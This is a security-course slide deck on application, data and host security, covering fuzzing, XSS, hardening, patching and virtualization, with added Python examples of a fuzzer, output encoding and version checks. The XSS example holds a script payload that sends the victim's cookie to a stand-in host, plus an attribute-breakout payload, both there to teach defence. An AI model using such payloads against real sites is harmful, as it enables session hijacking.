Application, Data and Host Security
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Fuzzing
Secure coding concepts
Error and exception handling
Input validation
Cross-site scripting prevention
Cross-site Request Forgery (XSRF) prevention
Application configuration baseline (proper settings)
Application hardening
Application patch management
Fuzzing
Most applications that accept input expect a particular type of data: string values,
numerical values, and so on. Sometimes it is possible to enter unexpected values and make
the application crash. When that happens, the user may be left with elevated privileges or
with access to data they should not have. Fuzzing is the technique of feeding an
application unexpected input in an attempt to make it crash or misbehave. The values can
be random, invalid, malformed, or simply outside the range the developer anticipated; a
common method is to flood the input with a stream of random bits, and a more targeted one
is to mutate known-good input (flip bits, truncate it, lengthen it, corrupt length fields).
The best defense against fuzzing being used as an attack on your systems is to fuzz-test
your own applications first, find the inputs that crash them, and fix the underlying
input-handling bugs.
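The following is an added example, not code from the original slides: a small mutation fuzzer in Python run against a toy record parser. The record format (a one-byte name length, the name, then a two-byte value), the sample record and the parser code are all constructed for the illustration. The "naive" parser trusts its input the way much real code does; the "hardened" one checks every assumption, so the same fuzzer finds no crash in it.

```python
import random

# Constructed sample record (not from the original slides):
# 1-byte name length, the name, then a 2-byte big-endian value.
SEED = bytes([4]) + b"temp" + (21).to_bytes(2, "big")


def parse_record_naive(data: bytes) -> dict:
    """Toy parser that trusts its input. It is deliberately unchecked, the way a
    lot of real input-handling code is: it assumes the length byte is present,
    that the name is valid UTF-8, and that the buffer is long enough."""
    name_len = data[0]                                # IndexError on empty input
    name = data[1:1 + name_len].decode("utf-8")       # UnicodeDecodeError on junk
    value = int.from_bytes(data[1 + name_len:3 + name_len], "big")
    return {"name": name, "value": value}


def parse_record_hardened(data: bytes):
    """Same format, but every assumption is checked. Malformed input yields
    None instead of an unexpected exception."""
    if len(data) < 1:
        return None
    name_len = data[0]
    if len(data) != 3 + name_len:                     # exact length: no short or trailing bytes
        return None
    try:
        name = data[1:1 + name_len].decode("utf-8")
    except UnicodeDecodeError:
        return None
    value = int.from_bytes(data[1 + name_len:], "big")
    return {"name": name, "value": value}


def mutate(seed: bytes, rng: random.Random) -> bytes:
    """One mutation of a valid input: bit flip, truncation, insertion of random
    bytes, or replacement with random bytes (the 'stream of random bits' case)."""
    data = bytearray(seed)
    choice = rng.randrange(4)
    if choice == 0 and data:
        i = rng.randrange(len(data))
        data[i] ^= 1 << rng.randrange(8)
    elif choice == 1:
        data = data[:rng.randrange(len(data) + 1)]
    elif choice == 2:
        pos = rng.randrange(len(data) + 1)
        data[pos:pos] = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 8)))
    else:
        data = bytearray(rng.randrange(256) for _ in range(rng.randrange(0, 16)))
    return bytes(data)


def fuzz(parser, seed: bytes, iterations: int = 2000, rng_seed: int = 1) -> dict:
    """Feed mutated inputs to `parser` and record, per exception type, the first
    input that triggered it. A fixed RNG seed makes runs reproducible, which
    matters when you hand a crashing input to a developer."""
    rng = random.Random(rng_seed)
    crashes = {}
    for _ in range(iterations):
        case = mutate(seed, rng)
        try:
            parser(case)
        except Exception as exc:                      # anything unexpected counts as a crash
            crashes.setdefault(type(exc).__name__, case)
    return crashes


if __name__ == "__main__":
    for parser in (parse_record_naive, parse_record_hardened):
        found = fuzz(parser, SEED)
        print(parser.__name__, "crashed on:", {k: v.hex() for k, v in found.items()})
```

Run as a script, the naive parser reports an IndexError (empty input) and usually a UnicodeDecodeError (corrupted name bytes), while the hardened parser reports nothing. Real fuzzers (AFL, libFuzzer and similar) add coverage feedback and a growing corpus, but the loop is the same: mutate, run, catch what the program was not written to handle.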
Cross-Site Scripting
Cross-site scripting (XSS) is an injection attack against web applications: an
attacker supplies input (a form field, a URL parameter, a comment, a profile name)
that contains client-side script, and the application echoes that input into a
page without validating or encoding it. The script then runs in the browser of
every user who views the page, with the privileges of the trusted site, so it can
read the session cookie, perform actions as the victim, or rewrite the page. The
attacker typically tricks the victim into visiting a crafted link or a page that
carries the payload.
The best protection is on the server side: validate input, and encode all untrusted
data for the context in which it is output (HTML body, HTML attribute, URL, script).
Disabling script execution in the browser, a Content Security Policy, and HttpOnly
session cookies limit the damage but do not replace output encoding.
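As an added example (not code from the original slides), the Python below renders the same untrusted input two ways: concatenated straight into HTML, which is the XSS bug, and encoded for each output context with the standard library's html.escape and urllib.parse.quote. The two attacker payloads and the page fragments are constructed for the illustration.

```python
import html
import urllib.parse

# Constructed attacker inputs (not from the original slides).
SCRIPT_PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
ATTRIBUTE_PAYLOAD = '" onmouseover="alert(1)'


def render_greeting_vulnerable(name: str) -> str:
    """Echoes untrusted input straight into the HTML body: this is the XSS bug."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    """Encodes for the HTML body context, so < > & \" ' lose their meaning."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_search_link_vulnerable(term: str) -> str:
    """Untrusted input inside attribute values; a single '"' lets the attacker
    close the attribute and add an event handler."""
    return f'<a title="{term}" href="/search?q={term}">{term}</a>'


def render_search_link_safe(term: str) -> str:
    """Each output context gets its own encoder:
    - HTML attribute value: html.escape with quote=True
    - URL query parameter: percent-encoding
    - HTML body: html.escape
    """
    attr = html.escape(term, quote=True)
    url = urllib.parse.quote(term, safe="")
    body = html.escape(term)
    return f'<a title="{attr}" href="/search?q={url}">{body}</a>'


def looks_injected(rendered: str) -> bool:
    """Crude check for the demo: does the output contain a live <script> tag or
    an attribute breakout that the template author did not write?"""
    lowered = rendered.lower()
    return "<script" in lowered or 'onmouseover="' in lowered


if __name__ == "__main__":
    for fn, payload in [
        (render_greeting_vulnerable, SCRIPT_PAYLOAD),
        (render_greeting_safe, SCRIPT_PAYLOAD),
        (render_search_link_vulnerable, ATTRIBUTE_PAYLOAD),
        (render_search_link_safe, ATTRIBUTE_PAYLOAD),
    ]:
        out = fn(payload)
        print(f"{fn.__name__:32} injected={looks_injected(out)}  {out}")
```

Note that one encoder is not enough: html.escape protects the body and attribute contexts, but a value placed inside a URL needs percent-encoding, and a value placed inside inline JavaScript needs yet another encoding. Template engines that auto-escape by default (Jinja2 with autoescape on, Django templates) apply the body encoding for you; the other contexts still need attention.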
Application hardening
Application hardening helps ensure that vulnerabilities are minimized. Run only the
applications and services that are needed to support your environment, and disable
or remove the rest. Attackers target application protocols, and many newer systems
offer a rich environment for end users; each additional protocol or service that is
left enabled enlarges your attack surface and so increases your risk.
Anti-virus
Anti-spam
Anti-spyware
Pop-up blockers
Host-based firewalls
Patch management
Hardware security
  Cable locks
  Safe
  Locking cabinets
Mobile devices
  Screen lock
  Strong password
  Device encryption
  Remote wipe/sanitation
  Voice encryption
  GPS tracking
Virtualization
Anti-malware
Install antivirus software. Antivirus software should be installed, with definitions
kept current, on all hosts: on servers as well as on every workstation. In addition to
real-time monitoring of incoming files, scheduled scans should run regularly to catch any
infection that slipped through.
Install antispam filters. It is estimated that over 98 percent of all email is now spam.
Spam filters keep the majority of this unwanted email from reaching users, and with it much
of the phishing and malware that arrives as attachments or links.
Install antispyware software. Some antispyware is bundled with antivirus packages; other
products are standalone. Whichever type you use, you must regularly check hosts for
spyware (often identified by the presence of tracking cookies) and remove whatever has
been installed.
Use pop-up blockers. Pop-ups (including pop-unders) are not only irritating but also a
security threat: they represent unwanted code running in the browser and can be used to
deliver malware or phishing pages.
Employ host-based firewalls. A firewall is the first line of defense against attackers
and network-borne malware. Almost every current operating system includes one, and most
are turned on by default; verify that it is enabled and that only the inbound ports the
host actually needs are open.
Patch management
Updates keep operating systems and applications at the most current revision level.
Researching updates is important to stay protected from newly discovered threats; when
possible, so is getting feedback from other users before you install an update, so you
can learn from their experience what difficulties may be encountered. Test updates on a
non-production system before deploying them widely.
Hotfixes
Hotfixes are used to make repairs to a system during normal operation, even though they
might require a reboot. They are typically narrow fixes for a specific problem, released
outside the regular update schedule.
Service pack
A service pack or support pack (depending on the vendor) is a comprehensive set of
fixes consolidated into a single package, usually cumulative over earlier fixes.
Patches
A patch is a temporary or quick fix to a program. Patches may be used to temporarily
bypass a set of instructions that has malfunctioned. Several OS vendors issue patches
that can be applied manually or from a distributed file to fix a program.
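Patch management only works if you can tell reliably whether a host is at or above the required level. The Python below is an added example, not code from the original slides: it compares installed package versions against a minimum-patched baseline using proper component-wise comparison. The package names, version strings, baseline and inventory are all constructed for the illustration and are not vendor data.

```python
import re
from typing import Dict, Tuple

# Constructed baseline of minimum patched versions (assumed, not vendor data).
BASELINE = {
    "openssl": "1.0.1g",
    "apache2": "2.4.10",
    "nginx": "1.10.3",
}

# Constructed host inventory, as a package manager might report it (assumed).
INVENTORY = {
    "openssl": "1.0.1f",
    "apache2": "2.4.9",
    "nginx": "1.10.3",
    "curl": "7.38.0",
}

VersionKey = Tuple[Tuple[int, str], ...]


def parse_version(version: str) -> VersionKey:
    """Split '1.0.1g' into ((1, ''), (0, ''), (1, 'g')) so that numeric parts
    compare as numbers and a trailing letter suffix compares after them.
    Plain string comparison gets this wrong: '1.10.3' < '1.9.15' as text."""
    parts = []
    for piece in version.split("."):
        match = re.fullmatch(r"(\d+)([A-Za-z]*)", piece)
        if not match:
            raise ValueError(f"unparseable version component: {piece!r}")
        parts.append((int(match.group(1)), match.group(2)))
    return tuple(parts)


def is_at_least(installed: str, required: str) -> bool:
    """True when the installed version meets or exceeds the required one."""
    return parse_version(installed) >= parse_version(required)


def find_unpatched(inventory: Dict[str, str], baseline: Dict[str, str]) -> Dict[str, Tuple[str, str]]:
    """Return {package: (installed, required)} for every baseline package that
    is installed below its required version. Packages not installed at all
    are skipped: there is nothing to patch."""
    unpatched = {}
    for package, required in baseline.items():
        installed = inventory.get(package)
        if installed is None:
            continue
        if not is_at_least(installed, required):
            unpatched[package] = (installed, required)
    return unpatched


if __name__ == "__main__":
    for package, (have, need) in find_unpatched(INVENTORY, BASELINE).items():
        print(f"{package}: installed {have}, required {need} -> PATCH NEEDED")
```

The comparison function is the part worth getting right: a scanner that compares version strings lexically will report a host running 1.10.3 as older than 1.9.15 and miss real gaps or raise false alarms. Real package ecosystems (Debian, RPM, PEP 440) each have their own ordering rules, so for production use call the ecosystem's own comparison routine rather than a generic one like this.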
Hardware security
Cable locks
Safe
Locking cabinets
Mobile devices
Screen lock
Strong password
Device encryption
Remote wipe/sanitation
Voice encryption
Virtualization
Virtualization technology lets you take a single physical device and hide its
characteristics from users; in essence, it allows you to run multiple items on one device
and make them appear as if they were stand-alone entities.
Breaking out of the virtual machine. If a malicious user could break out of the
virtualization layer (a VM escape) and reach the hypervisor or the other virtual machines
on the same host, they could access data they should never have access to. Keep the
hypervisor patched, and do not place workloads of very different trust levels on one host
without compensating controls.
Network and security controls can intermingle. The tools used to administer the virtual
machines may not have the same granularity as those used to manage the physical network,
so an administrator of the virtualization layer may end up controlling network
segmentation and guest storage as well. This could lead to privilege escalation and a
compromise of security.
Data encryption
Full disk
Database
Individual files
Removable media
Mobile devices
Questions??